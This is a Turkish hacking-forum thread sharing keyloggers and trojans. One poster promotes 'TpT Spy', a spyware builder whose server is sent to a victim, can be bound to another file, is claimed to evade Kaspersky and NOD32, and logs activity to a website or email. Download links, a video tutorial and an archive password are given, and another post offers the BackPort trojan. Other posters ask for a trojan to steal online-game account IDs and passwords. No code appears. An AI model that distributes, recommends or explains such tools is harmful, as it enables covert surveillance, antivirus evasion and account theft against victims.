En iyi Keylogger ve Trojanler!! ( Specials ~ Keylogger & Trojan ] !![ Açıklamalı ]!!

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
saolun beyler emeklerinizin karsılıgı olamaz...

emeğinize sağlık arkadaşar yalnız... back port ta ben hiçbirşey yaamıyoru editör sayfasını bulu dio ne yapıcam ta olarak acaba server da oluşturmuyor..

ya beyler bi yardımcı olun plzzz yaaa:( onlıne oyun icin hangisi tafsiye edersiniz trojen plz plz cok lazım abiler ya:( trojeni ona attıktan sonra id le pv gelmesi icin

hellboy726' Alıntı:
GxI91828.jpg

TpT Spy benim özdem olan en iyi casus yazılımlardan biridir. serveri oluşturup karşı tarafa göndericeksiniz. isterseniz bu serveri dosya ilede birleştirebilirsiniz. bende kasper sky -nod32 antivirüs programlarında test ettim kessinlikle yakalıanmıyor.

program bilgisayarda gerçekleşen tüm olaylar hakkında detaylı bilgi veriyor. isterseniz bunları web sitenizdeki yazılım izni olan bir log dosyasına istersenizde belli aralıklar'ile E-posta adresinize gönderilmesinde kullanabilirsiniz..

Download:
http://www.hell-world.org/hackhell/hacking/tptspy/tpt-spy.rar

Vidyolu anlatım :

http://turkhard.hell-world.org/TpTSpyvideo.zip

anti viruse yakalanmaz demisin ama bende hemen anında yakalandı valla anlayamadım yardımcı olursan sevinirim

hellboy kardeşim ben bu edit serverı bulamadım tamamen anlatırmısın

:saskin hellboy kardesim yaw ben bu edit serverı bulamıyom onu bana bi resimli anlatımla yapsana:victory oke;):goz:

güzel çalışma deneyecegim şimdiden teşekkürler

BackPort trojanı, eksik server editörü eklenerek download linki yenilenmiştir..

bilginize..

TuRK_HaRD' Alıntı:
BackPort trojanı, eksik server editörü eklenerek download linki yenilenmiştir..

bilginize..
bende daha açılırken tanımlanamayan arşiv sonucu diyo ama 600 boyutunda exe çıkıyo inş hatadan dolayı eksik olmaz 2. ve en önemlisi abi RAR ŞİFRESİNİ NE YAPTIN:vur

kraql2' Alıntı:
bende daha açılırken tanımlanamayan arşiv sonucu diyo ama 600 boyutunda exe çıkıyo inş hatadan dolayı eksik olmaz 2. ve en önemlisi abi RAR ŞİFRESİNİ NE YAPTIN:vur

rar'da bi problem yok, baktın hiç açılmıyor, tekrardan yükle..

şifre hackhell.com

ya bende habire sorun çıkartıyorumda yine indirdim ilk açarken başta tanımlanamayan arşiv diyo kapat diyorum black masaüstüne çıkarıtken hackhell.com copy paste yapıyorum bunu ama yanlış pass diye ve tekrar tanımlanamayan arşiv diyo ama blackportu çıkartıyo zipten tıklıyorum çıkartıgı klasor e içi boi :/

arkadaşlar bilgisayarımda trojan uyarısı çıkıyor.ne yapabilir.yardımcı olursanız sevinirim...

ya ben burdaki bütün linkleri tıklatım ama hata oluştu diyo bendemi bi normallik var yoksa makinedemi yardımcı olurmusunuz....

Buzamana kadar hep ben uğraştım trojanle birazda başkaları uğraşsın.
Bende o zevki tatmak istiyorum. Ama sadece şaka olsun diye

Buzamana kadar hep ben uğraştım Trojenle. Birazda arkadaşlarım uğraşsın . Sadece şaka amacıyla. Bilgi en değerli HAZiNE sizler bu bilgiyi paylaştığınız için emeğe gecen herkeze TESEKUR Ederim

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Geri